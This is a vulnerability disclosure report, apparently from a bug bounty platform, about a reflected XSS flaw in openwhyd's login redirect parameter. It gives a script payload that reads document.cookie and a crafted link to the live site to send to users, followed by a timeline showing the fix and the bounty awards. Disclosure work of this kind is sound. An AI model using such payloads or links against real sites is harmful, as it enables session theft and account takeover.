Cross-site Scripting (XSS) - Reflected in openwhyd/openwhyd

Valid

Reported on

Dec 13th 2021

Description

openwhyd is vulnerable to Reflected XSS vulnerability via the redirect parameter at login page.

Payload

<script>alert(document.cookie)</script>

Vulnerable URL

https://openwhyd.org/login?redirect=<script>alert(document.cookie)</script>

Proof of Concept

Send users the following login link https://openwhyd.org/login?redirect=<script>alert(document.cookie)</script>
After users use their registered account to log in, they will be triggered by the XSS popup.

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We are processing your report and will contact the openwhyd team within 24 hours. 2 years ago

We have contacted a member of the openwhyd team and are waiting to hear back 2 years ago

We have sent a follow up to the openwhyd team. We will try again in 7 days. 2 years ago

Adrien Joly validated this vulnerability 2 years ago

KhanhCM has been awarded the disclosure bounty

The fix bounty is now up for grabs

Adrien Joly marked this as fixed in 1.45.12 with commit 102a97 2 years ago

Adrien Joly has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation